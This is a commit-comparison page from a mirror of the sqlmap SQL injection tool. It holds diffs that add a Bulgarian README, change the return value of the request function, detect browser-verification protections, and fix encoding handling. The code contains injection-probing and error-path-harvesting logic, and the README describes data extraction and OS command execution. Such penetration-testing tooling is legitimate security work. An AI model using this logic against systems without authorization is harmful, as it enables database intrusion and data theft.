mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-12-07 13:11:29 +00:00
Compare commits
26 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
ce48217ada | ||
|
|
0e728aa73e | ||
|
|
f93c19ba9d | ||
|
|
a42ddad9c1 | ||
|
|
a2973296a2 | ||
|
|
0961f6a5e9 | ||
|
|
5ec44b8346 | ||
|
|
d577c57a11 | ||
|
|
ca24509e19 | ||
|
|
e2d3187a78 | ||
|
|
b4980778dd | ||
|
|
71457fea0e | ||
|
|
34281af3f6 | ||
|
|
7dbbf3ecf5 | ||
|
|
c41c93a404 | ||
|
|
9a7343e9f7 | ||
|
|
e0401104f2 | ||
|
|
9da8d55128 | ||
|
|
864711b434 | ||
|
|
996ad59126 | ||
|
|
6d48df2454 | ||
|
|
55a43a837b | ||
|
|
455d41c6a0 | ||
|
|
0f34300221 | ||
|
|
93a875ec71 | ||
|
|
0edb4f6680 |
@@ -52,6 +52,7 @@ Links
|
||||
Translations
|
||||
----
|
||||
|
||||
* [Bulgarian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md)
|
||||
* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md)
|
||||
* [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md)
|
||||
* [French](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md)
|
||||
|
||||
50
doc/translations/README-bg-BG.md
Normal file
50
doc/translations/README-bg-BG.md
Normal file
@@ -0,0 +1,50 @@
|
||||
# sqlmap
|
||||
|
||||
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmap e инструмент за тестване и проникване, с отворен код, който автоматизира процеса на откриване и използване на недостатъците на SQL база данните чрез SQL инжекция, която ги взима от сървъра. Снабден е с мощен детектор, множество специални функции за най-добрия тестер и широк спектър от функции, които могат да се използват за множество цели - извличане на данни от базата данни, достъп до основната файлова система и изпълняване на команди на операционната система.
|
||||
|
||||
Демо снимки
|
||||
----
|
||||
|
||||

|
||||
|
||||
Можете да посетите [колекцията от снимки на екрана](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), показващи някои функции, качени на wiki.
|
||||
|
||||
Инсталиране
|
||||
----
|
||||
|
||||
Може да изтеглине най-новите tar архиви като кликнете [тук](https://github.com/sqlmapproject/sqlmap/tarball/master) или най-новите zip архиви като кликнете [тук](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
||||
|
||||
За предпочитане е да изтеглите sqlmap като клонирате [Git](https://github.com/sqlmapproject/sqlmap) хранилището:
|
||||
|
||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||
|
||||
sqlmap работи самостоятелно с [Python](http://www.python.org/download/) версия **2.6.x** и **2.7.x** на всички платформи.
|
||||
|
||||
Използване
|
||||
----
|
||||
|
||||
За да получите списък с основните опции използвайте:
|
||||
|
||||
python sqlmap.py -h
|
||||
|
||||
За да получите списък с всички опции използвайте:
|
||||
|
||||
python sqlmap.py -hh
|
||||
|
||||
Може да намерите пример за използване на sqlmap [тук](https://asciinema.org/a/46601).
|
||||
За да разберете възможностите на sqlmap, списък на поддържаните функции и описание на всички опции, заедно с примери, се препоръчва да се разгледа [упътването](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
|
||||
|
||||
Връзки
|
||||
----
|
||||
|
||||
* Начална страница: http://sqlmap.org
|
||||
* Изтегляне: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||
* RSS емисия: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||
* Проследяване на проблеми и въпроси: https://github.com/sqlmapproject/sqlmap/issues
|
||||
* Упътване: https://github.com/sqlmapproject/sqlmap/wiki
|
||||
* Често задавани въпроси (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||
* Демо: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||
* Снимки на екрана: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||
@@ -552,7 +552,7 @@ def checkSqlInjection(place, parameter, value):
|
||||
# Perform the test's request and grep the response
|
||||
# body for the test's <grep> regular expression
|
||||
try:
|
||||
page, headers = Request.queryPage(reqPayload, place, content=True, raise404=False)
|
||||
page, headers, _ = Request.queryPage(reqPayload, place, content=True, raise404=False)
|
||||
output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE) \
|
||||
or extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None, re.DOTALL | re.IGNORECASE) \
|
||||
or extractRegexResult(check, listToStrValue([headers[key] for key in headers.keys() if key.lower() != URI_HTTP_HEADER.lower()] if headers else None), re.DOTALL | re.IGNORECASE) \
|
||||
@@ -817,6 +817,8 @@ def heuristicCheckDbms(injection):
|
||||
infoMsg += "could be '%s' " % retVal
|
||||
logger.info(infoMsg)
|
||||
|
||||
kb.heuristicExtendedDbms = retVal
|
||||
|
||||
return retVal
|
||||
|
||||
def checkFalsePositives(injection):
|
||||
@@ -959,7 +961,7 @@ def heuristicCheckSqlInjection(place, parameter):
|
||||
|
||||
payload = "%s%s%s" % (prefix, randStr, suffix)
|
||||
payload = agent.payload(place, parameter, newValue=payload)
|
||||
page, _ = Request.queryPage(payload, place, content=True, raise404=False)
|
||||
page, _, _ = Request.queryPage(payload, place, content=True, raise404=False)
|
||||
|
||||
kb.heuristicPage = page
|
||||
kb.heuristicMode = False
|
||||
@@ -1015,7 +1017,7 @@ def heuristicCheckSqlInjection(place, parameter):
|
||||
value = "%s%s%s" % (randStr1, DUMMY_NON_SQLI_CHECK_APPENDIX, randStr2)
|
||||
payload = "%s%s%s" % (prefix, "'%s" % value, suffix)
|
||||
payload = agent.payload(place, parameter, newValue=payload)
|
||||
page, _ = Request.queryPage(payload, place, content=True, raise404=False)
|
||||
page, _, _ = Request.queryPage(payload, place, content=True, raise404=False)
|
||||
|
||||
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
|
||||
|
||||
@@ -1124,7 +1126,7 @@ def checkDynamicContent(firstPage, secondPage):
|
||||
warnMsg += ". sqlmap is going to retry the request"
|
||||
logger.critical(warnMsg)
|
||||
|
||||
secondPage, _ = Request.queryPage(content=True)
|
||||
secondPage, _, _ = Request.queryPage(content=True)
|
||||
findDynamicContent(firstPage, secondPage)
|
||||
|
||||
def checkStability():
|
||||
@@ -1147,7 +1149,7 @@ def checkStability():
|
||||
delay = max(0, min(1, delay))
|
||||
time.sleep(delay)
|
||||
|
||||
secondPage, _ = Request.queryPage(content=True, noteResponseTime=False, raise404=False)
|
||||
secondPage, _, _ = Request.queryPage(content=True, noteResponseTime=False, raise404=False)
|
||||
|
||||
if kb.redirectChoice:
|
||||
return None
|
||||
@@ -1229,7 +1231,7 @@ def checkString():
|
||||
infoMsg += "target URL page content"
|
||||
logger.info(infoMsg)
|
||||
|
||||
page, headers = Request.queryPage(content=True)
|
||||
page, headers, _ = Request.queryPage(content=True)
|
||||
rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page)
|
||||
|
||||
if conf.string not in rawResponse:
|
||||
@@ -1248,7 +1250,7 @@ def checkRegexp():
|
||||
infoMsg += "the target URL page content"
|
||||
logger.info(infoMsg)
|
||||
|
||||
page, headers = Request.queryPage(content=True)
|
||||
page, headers, _ = Request.queryPage(content=True)
|
||||
rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page)
|
||||
|
||||
if not re.search(conf.regexp, rawResponse, re.I | re.M):
|
||||
@@ -1455,7 +1457,7 @@ def checkConnection(suppressOutput=False):
|
||||
|
||||
try:
|
||||
kb.originalPageTime = time.time()
|
||||
page, headers = Request.queryPage(content=True, noteResponseTime=False)
|
||||
page, headers, _ = Request.queryPage(content=True, noteResponseTime=False)
|
||||
kb.originalPage = kb.pageTemplate = page
|
||||
|
||||
kb.errorIsNone = False
|
||||
|
||||
@@ -70,7 +70,7 @@ def setHandler():
|
||||
(DBMS.INFORMIX, INFORMIX_ALIASES, InformixMap, InformixConn),
|
||||
]
|
||||
|
||||
_ = max(_ if (Backend.getIdentifiedDbms() or "").lower() in _[1] else None for _ in items)
|
||||
_ = max(_ if (Backend.getIdentifiedDbms() or kb.heuristicExtendedDbms or "").lower() in _[1] else None for _ in items)
|
||||
if _:
|
||||
items.remove(_)
|
||||
items.insert(0, _)
|
||||
|
||||
@@ -2543,7 +2543,7 @@ def urlencode(value, safe="%&=-_", convall=False, limit=False, spaceplus=False):
|
||||
# corner case when character % really needs to be
|
||||
# encoded (when not representing URL encoded char)
|
||||
# except in cases when tampering scripts are used
|
||||
if all(map(lambda x: '%' in x, [safe, value])) and not kb.tamperFunctions:
|
||||
if all('%' in _ for _ in (safe, value)) and not kb.tamperFunctions:
|
||||
value = re.sub("%(?![0-9a-fA-F]{2})", "%25", value)
|
||||
|
||||
while True:
|
||||
@@ -4393,4 +4393,4 @@ def getSafeExString(ex, encoding=None):
|
||||
elif getattr(ex, "msg", None):
|
||||
retVal = ex.msg
|
||||
|
||||
return getUnicode(retVal, encoding=encoding)
|
||||
return getUnicode(retVal or "", encoding=encoding).strip()
|
||||
|
||||
@@ -628,7 +628,7 @@ def _findPageForms():
|
||||
logger.info(infoMsg)
|
||||
|
||||
if not any((conf.bulkFile, conf.googleDork, conf.sitemapUrl)):
|
||||
page, _ = Request.queryPage(content=True)
|
||||
page, _, _ = Request.queryPage(content=True)
|
||||
findPageForms(page, conf.url, True, True)
|
||||
else:
|
||||
if conf.bulkFile:
|
||||
@@ -1863,6 +1863,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
|
||||
kb.authHeader = None
|
||||
kb.bannerFp = AttribDict()
|
||||
kb.binaryField = False
|
||||
kb.browserVerification = None
|
||||
|
||||
kb.brute = AttribDict({"tables": [], "columns": []})
|
||||
kb.bruteMode = False
|
||||
@@ -1922,6 +1923,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
|
||||
kb.futileUnion = None
|
||||
kb.headersFp = {}
|
||||
kb.heuristicDbms = None
|
||||
kb.heuristicExtendedDbms = None
|
||||
kb.heuristicMode = False
|
||||
kb.heuristicPage = False
|
||||
kb.heuristicTest = None
|
||||
|
||||
@@ -77,8 +77,8 @@ optDict = {
|
||||
"testParameter": "string",
|
||||
"skip": "string",
|
||||
"skipStatic": "boolean",
|
||||
"skip": "string",
|
||||
"paramExclude": "string",
|
||||
"dbms": "string",
|
||||
"dbmsCred": "string",
|
||||
"os": "string",
|
||||
"invalidBignum": "boolean",
|
||||
|
||||
@@ -19,7 +19,7 @@ from lib.core.enums import DBMS_DIRECTORY_NAME
|
||||
from lib.core.enums import OS
|
||||
|
||||
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
||||
VERSION = "1.1.6.0"
|
||||
VERSION = "1.1.7.0"
|
||||
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
|
||||
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
|
||||
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
|
||||
@@ -295,7 +295,7 @@ BLANK = "<blank>"
|
||||
CURRENT_DB = "CD"
|
||||
|
||||
# Regular expressions used for finding file paths in error messages
|
||||
FILE_PATH_REGEXES = (r" in (file )?<b>(?P<result>.*?)</b> on line \d+", r"in (?P<result>[^<>]+?) on line \d+", r"(?:[>(\[\s])(?P<result>[A-Za-z]:[\\/][\w. \\/-]*)", r"(?:[>(\[\s])(?P<result>/\w[/\w.-]+)", r"href=['\"]file://(?P<result>/[^'\"]+)")
|
||||
FILE_PATH_REGEXES = (r"<b>(?P<result>[^<>]+?)</b> on line \d+", r"(?P<result>[^<>'\"]+?)['\"]? on line \d+", r"(?:[>(\[\s])(?P<result>[A-Za-z]:[\\/][\w. \\/-]*)", r"(?:[>(\[\s])(?P<result>/\w[/\w.-]+)", r"href=['\"]file://(?P<result>/[^'\"]+)")
|
||||
|
||||
# Regular expressions used for parsing error messages (--parse-errors)
|
||||
ERROR_PARSING_REGEXES = (
|
||||
|
||||
@@ -9,6 +9,8 @@ import codecs
|
||||
import functools
|
||||
import os
|
||||
import re
|
||||
import subprocess
|
||||
import sys
|
||||
import tempfile
|
||||
import time
|
||||
import urlparse
|
||||
@@ -128,15 +130,15 @@ def _setRequestParams():
|
||||
if kb.processUserMarks:
|
||||
kb.testOnlyCustom = True
|
||||
|
||||
if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data):
|
||||
if re.search(JSON_RECOGNITION_REGEX, conf.data):
|
||||
message = "JSON data found in %s data. " % conf.method
|
||||
message += "Do you want to process it? [Y/n/q] "
|
||||
choice = readInput(message, default='Y')
|
||||
if re.search(JSON_RECOGNITION_REGEX, conf.data):
|
||||
message = "JSON data found in %s data. " % conf.method
|
||||
message += "Do you want to process it? [Y/n/q] "
|
||||
choice = readInput(message, default='Y')
|
||||
|
||||
if choice == 'Q':
|
||||
raise SqlmapUserQuitException
|
||||
elif choice == 'Y':
|
||||
if choice == 'Q':
|
||||
raise SqlmapUserQuitException
|
||||
elif choice == 'Y':
|
||||
if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data):
|
||||
conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)
|
||||
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
|
||||
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*"[^"]+)"', functools.partial(process, repl=r'\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR), conf.data)
|
||||
@@ -147,59 +149,68 @@ def _setRequestParams():
|
||||
_ = re.sub(r'("[^"]+)"', '\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR, _)
|
||||
_ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', '\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR, _)
|
||||
conf.data = conf.data.replace(match.group(0), match.group(0).replace(match.group(2), _))
|
||||
kb.postHint = POST_HINT.JSON
|
||||
|
||||
elif re.search(JSON_LIKE_RECOGNITION_REGEX, conf.data):
|
||||
message = "JSON-like data found in %s data. " % conf.method
|
||||
message += "Do you want to process it? [Y/n/q] "
|
||||
choice = readInput(message, default='Y').upper()
|
||||
kb.postHint = POST_HINT.JSON
|
||||
|
||||
if choice == 'Q':
|
||||
raise SqlmapUserQuitException
|
||||
elif choice == 'Y':
|
||||
elif re.search(JSON_LIKE_RECOGNITION_REGEX, conf.data):
|
||||
message = "JSON-like data found in %s data. " % conf.method
|
||||
message += "Do you want to process it? [Y/n/q] "
|
||||
choice = readInput(message, default='Y').upper()
|
||||
|
||||
if choice == 'Q':
|
||||
raise SqlmapUserQuitException
|
||||
elif choice == 'Y':
|
||||
if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data):
|
||||
conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)
|
||||
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
|
||||
conf.data = re.sub(r"('(?P<name>[^']+)'\s*:\s*'[^']+)'", functools.partial(process, repl=r"\g<1>%s'" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
|
||||
conf.data = re.sub(r"('(?P<name>[^']+)'\s*:\s*)(-?\d[\d\.]*\b)", functools.partial(process, repl=r"\g<0>%s" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
|
||||
kb.postHint = POST_HINT.JSON_LIKE
|
||||
|
||||
elif re.search(ARRAY_LIKE_RECOGNITION_REGEX, conf.data):
|
||||
message = "Array-like data found in %s data. " % conf.method
|
||||
message += "Do you want to process it? [Y/n/q] "
|
||||
choice = readInput(message, default='Y').upper()
|
||||
kb.postHint = POST_HINT.JSON_LIKE
|
||||
|
||||
if choice == 'Q':
|
||||
raise SqlmapUserQuitException
|
||||
elif choice == 'Y':
|
||||
elif re.search(ARRAY_LIKE_RECOGNITION_REGEX, conf.data):
|
||||
message = "Array-like data found in %s data. " % conf.method
|
||||
message += "Do you want to process it? [Y/n/q] "
|
||||
choice = readInput(message, default='Y').upper()
|
||||
|
||||
if choice == 'Q':
|
||||
raise SqlmapUserQuitException
|
||||
elif choice == 'Y':
|
||||
if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data):
|
||||
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
|
||||
conf.data = re.sub(r"(=[^%s]+)" % DEFAULT_GET_POST_DELIMITER, r"\g<1>%s" % CUSTOM_INJECTION_MARK_CHAR, conf.data)
|
||||
kb.postHint = POST_HINT.ARRAY_LIKE
|
||||
|
||||
elif re.search(XML_RECOGNITION_REGEX, conf.data):
|
||||
message = "SOAP/XML data found in %s data. " % conf.method
|
||||
message += "Do you want to process it? [Y/n/q] "
|
||||
choice = readInput(message, default='Y').upper()
|
||||
kb.postHint = POST_HINT.ARRAY_LIKE
|
||||
|
||||
if choice == 'Q':
|
||||
raise SqlmapUserQuitException
|
||||
elif choice == 'Y':
|
||||
elif re.search(XML_RECOGNITION_REGEX, conf.data):
|
||||
message = "SOAP/XML data found in %s data. " % conf.method
|
||||
message += "Do you want to process it? [Y/n/q] "
|
||||
choice = readInput(message, default='Y').upper()
|
||||
|
||||
if choice == 'Q':
|
||||
raise SqlmapUserQuitException
|
||||
elif choice == 'Y':
|
||||
if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data):
|
||||
conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)
|
||||
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
|
||||
conf.data = re.sub(r"(<(?P<name>[^>]+)( [^<]*)?>)([^<]+)(</\2)", functools.partial(process, repl=r"\g<1>\g<4>%s\g<5>" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
|
||||
kb.postHint = POST_HINT.SOAP if "soap" in conf.data.lower() else POST_HINT.XML
|
||||
|
||||
elif re.search(MULTIPART_RECOGNITION_REGEX, conf.data):
|
||||
message = "Multipart-like data found in %s data. " % conf.method
|
||||
message += "Do you want to process it? [Y/n/q] "
|
||||
choice = readInput(message, default='Y').upper()
|
||||
kb.postHint = POST_HINT.SOAP if "soap" in conf.data.lower() else POST_HINT.XML
|
||||
|
||||
if choice == 'Q':
|
||||
raise SqlmapUserQuitException
|
||||
elif choice == 'Y':
|
||||
elif re.search(MULTIPART_RECOGNITION_REGEX, conf.data):
|
||||
message = "Multipart-like data found in %s data. " % conf.method
|
||||
message += "Do you want to process it? [Y/n/q] "
|
||||
choice = readInput(message, default='Y').upper()
|
||||
|
||||
if choice == 'Q':
|
||||
raise SqlmapUserQuitException
|
||||
elif choice == 'Y':
|
||||
if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data):
|
||||
conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)
|
||||
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
|
||||
conf.data = re.sub(r"(?si)((Content-Disposition[^\n]+?name\s*=\s*[\"'](?P<name>[^\n]+?)[\"']).+?)(((\r)?\n)+--)", functools.partial(process, repl=r"\g<1>%s\g<4>" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
|
||||
kb.postHint = POST_HINT.MULTIPART
|
||||
|
||||
kb.postHint = POST_HINT.MULTIPART
|
||||
|
||||
if not kb.postHint:
|
||||
if CUSTOM_INJECTION_MARK_CHAR in conf.data: # later processed
|
||||
@@ -660,6 +671,7 @@ def _createTargetDirs():
|
||||
with codecs.open(os.path.join(conf.outputPath, "target.txt"), "w+", UNICODE_ENCODING) as f:
|
||||
f.write(kb.originalUrls.get(conf.url) or conf.url or conf.hostname)
|
||||
f.write(" (%s)" % (HTTPMETHOD.POST if conf.data else HTTPMETHOD.GET))
|
||||
f.write(" # %s" % getUnicode(subprocess.list2cmdline(sys.argv), encoding=sys.stdin.encoding))
|
||||
if conf.data:
|
||||
f.write("\n\n%s" % getUnicode(conf.data))
|
||||
except IOError, ex:
|
||||
|
||||
@@ -48,7 +48,8 @@ def cmdLineParser(argv=None):
|
||||
|
||||
checkSystemEncoding()
|
||||
|
||||
_ = getUnicode(os.path.basename(argv[0]), encoding=sys.getfilesystemencoding() or UNICODE_ENCODING)
|
||||
# Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING")
|
||||
_ = getUnicode(os.path.basename(argv[0]), encoding=sys.stdin.encoding)
|
||||
|
||||
usage = "%s%s [options]" % ("python " if not IS_WIN else "", \
|
||||
"\"%s\"" % _ if " " in _ else _)
|
||||
@@ -848,8 +849,9 @@ def cmdLineParser(argv=None):
|
||||
advancedHelp = True
|
||||
extraHeaders = []
|
||||
|
||||
# Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING")
|
||||
for arg in argv:
|
||||
_.append(getUnicode(arg, encoding=sys.getfilesystemencoding() or UNICODE_ENCODING))
|
||||
_.append(getUnicode(arg, encoding=sys.stdin.encoding))
|
||||
|
||||
argv = _
|
||||
checkDeprecatedOptions(argv)
|
||||
|
||||
@@ -155,7 +155,7 @@ def checkCharEncoding(encoding, warn=True):
|
||||
return encoding
|
||||
|
||||
# Reference: http://www.destructor.de/charsets/index.htm
|
||||
translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"}
|
||||
translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "iso-8859-0": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"}
|
||||
|
||||
for delimiter in (';', ',', '('):
|
||||
if delimiter in encoding:
|
||||
@@ -375,6 +375,13 @@ def processResponse(page, responseHeaders, status=None):
|
||||
conf.paramDict[PLACE.POST][name] = value
|
||||
conf.parameters[PLACE.POST] = re.sub("(?i)(%s=)[^&]+" % re.escape(name), r"\g<1>%s" % re.escape(value), conf.parameters[PLACE.POST])
|
||||
|
||||
if not kb.browserVerification and re.search(r"(?i)browser.?verification", page or ""):
|
||||
kb.browserVerification = True
|
||||
warnMsg = "potential browser verification protection mechanism detected"
|
||||
if re.search(r"(?i)CloudFlare", page):
|
||||
warnMsg += " (CloudFlare)"
|
||||
singleTimeWarnMessage(warnMsg)
|
||||
|
||||
if not kb.captchaDetected and re.search(r"(?i)captcha", page or ""):
|
||||
for match in re.finditer(r"(?si)<form.+?</form>", page):
|
||||
if re.search(r"(?i)captcha", match.group(0)):
|
||||
|
||||
@@ -289,7 +289,7 @@ class Connect(object):
|
||||
|
||||
_ = urlparse.urlsplit(url)
|
||||
requestMsg = u"HTTP request [#%d]:\n%s " % (threadData.lastRequestUID, method or (HTTPMETHOD.POST if post is not None else HTTPMETHOD.GET))
|
||||
requestMsg += ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) if not any((refreshing, crawling, checking)) else url
|
||||
requestMsg += getUnicode(("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) if not any((refreshing, crawling, checking)) else url)
|
||||
responseMsg = u"HTTP response "
|
||||
requestHeaders = u""
|
||||
responseHeaders = None
|
||||
@@ -622,7 +622,7 @@ class Connect(object):
|
||||
debugMsg = "got HTTP error code: %d (%s)" % (code, status)
|
||||
logger.debug(debugMsg)
|
||||
|
||||
except (urllib2.URLError, socket.error, socket.timeout, httplib.HTTPException, struct.error, binascii.Error, ProxyError, SqlmapCompressionException, WebSocketException, TypeError):
|
||||
except (urllib2.URLError, socket.error, socket.timeout, httplib.HTTPException, struct.error, binascii.Error, ProxyError, SqlmapCompressionException, WebSocketException, TypeError, ValueError):
|
||||
tbMsg = traceback.format_exc()
|
||||
|
||||
if checking:
|
||||
@@ -660,6 +660,8 @@ class Connect(object):
|
||||
warnMsg += " ('%s')" % match.group(1).strip()
|
||||
elif "NTLM" in tbMsg:
|
||||
warnMsg = "there has been a problem with NTLM authentication"
|
||||
elif "Invalid header name" in tbMsg: # (e.g. PostgreSQL ::Text payload)
|
||||
return None, None, None
|
||||
elif "BadStatusLine" in tbMsg:
|
||||
warnMsg = "connection dropped or unknown HTTP "
|
||||
warnMsg += "status code received"
|
||||
@@ -679,6 +681,9 @@ class Connect(object):
|
||||
if "BadStatusLine" not in tbMsg and any((conf.proxy, conf.tor)):
|
||||
warnMsg += " or proxy"
|
||||
|
||||
if silent:
|
||||
return None, None, None
|
||||
|
||||
with kb.locks.connError:
|
||||
kb.connErrorCounter += 1
|
||||
|
||||
@@ -692,9 +697,7 @@ class Connect(object):
|
||||
if kb.connErrorChoice is False:
|
||||
raise SqlmapConnectionException(warnMsg)
|
||||
|
||||
if silent:
|
||||
return None, None, None
|
||||
elif "forcibly closed" in tbMsg:
|
||||
if "forcibly closed" in tbMsg:
|
||||
logger.critical(warnMsg)
|
||||
return None, None, None
|
||||
elif ignoreTimeout and any(_ in tbMsg for _ in ("timed out", "IncompleteRead")):
|
||||
@@ -1035,16 +1038,19 @@ class Connect(object):
|
||||
try:
|
||||
compiler.parse(unicodeencode(conf.evalCode.replace(';', '\n')))
|
||||
except SyntaxError, ex:
|
||||
original = replacement = ex.text.strip()
|
||||
for _ in re.findall(r"[A-Za-z_]+", original)[::-1]:
|
||||
if _ in keywords:
|
||||
replacement = replacement.replace(_, "%s%s" % (_, EVALCODE_KEYWORD_SUFFIX))
|
||||
if ex.text:
|
||||
original = replacement = ex.text.strip()
|
||||
for _ in re.findall(r"[A-Za-z_]+", original)[::-1]:
|
||||
if _ in keywords:
|
||||
replacement = replacement.replace(_, "%s%s" % (_, EVALCODE_KEYWORD_SUFFIX))
|
||||
break
|
||||
if original == replacement:
|
||||
conf.evalCode = conf.evalCode.replace(EVALCODE_KEYWORD_SUFFIX, "")
|
||||
break
|
||||
if original == replacement:
|
||||
conf.evalCode = conf.evalCode.replace(EVALCODE_KEYWORD_SUFFIX, "")
|
||||
break
|
||||
else:
|
||||
conf.evalCode = conf.evalCode.replace(getUnicode(ex.text.strip(), UNICODE_ENCODING), replacement)
|
||||
else:
|
||||
conf.evalCode = conf.evalCode.replace(getUnicode(ex.text.strip(), UNICODE_ENCODING), replacement)
|
||||
break
|
||||
else:
|
||||
break
|
||||
|
||||
@@ -1224,7 +1230,7 @@ class Connect(object):
|
||||
kb.permissionFlag = re.search(PERMISSION_DENIED_REGEX, page or "", re.I) is not None
|
||||
|
||||
if content or response:
|
||||
return page, headers
|
||||
return page, headers, code
|
||||
|
||||
if getRatioValue:
|
||||
return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison(page, headers, code, getRatioValue=True, pageLength=pageLength)
|
||||
|
||||
@@ -13,7 +13,7 @@ def getPageTemplate(payload, place):
|
||||
|
||||
if payload and place:
|
||||
if (payload, place) not in kb.pageTemplates:
|
||||
page, _ = Request.queryPage(payload, place, content=True, raise404=False)
|
||||
page, _, _ = Request.queryPage(payload, place, content=True, raise404=False)
|
||||
kb.pageTemplates[(payload, place)] = (page, kb.lastParserStatus is None)
|
||||
|
||||
retVal = kb.pageTemplates[(payload, place)]
|
||||
|
||||
@@ -232,7 +232,7 @@ class Web:
|
||||
if place in conf.parameters:
|
||||
value = re.sub(r"(\A|&)(\w+)=", "\g<2>[]=", conf.parameters[place])
|
||||
if "[]" in value:
|
||||
page, headers = Request.queryPage(value=value, place=place, content=True, raise404=False, silent=True, noteResponseTime=False)
|
||||
page, headers, _ = Request.queryPage(value=value, place=place, content=True, raise404=False, silent=True, noteResponseTime=False)
|
||||
parseFilePaths(page)
|
||||
|
||||
cookie = None
|
||||
@@ -244,12 +244,12 @@ class Web:
|
||||
if cookie:
|
||||
value = re.sub(r"(\A|;)(\w+)=[^;]*", "\g<2>=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", cookie)
|
||||
if value != cookie:
|
||||
page, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
|
||||
page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
|
||||
parseFilePaths(page)
|
||||
|
||||
value = re.sub(r"(\A|;)(\w+)=[^;]*", "\g<2>=", cookie)
|
||||
if value != cookie:
|
||||
page, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
|
||||
page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
|
||||
parseFilePaths(page)
|
||||
|
||||
directories = list(arrayizeValue(getManualDirectories()))
|
||||
|
||||
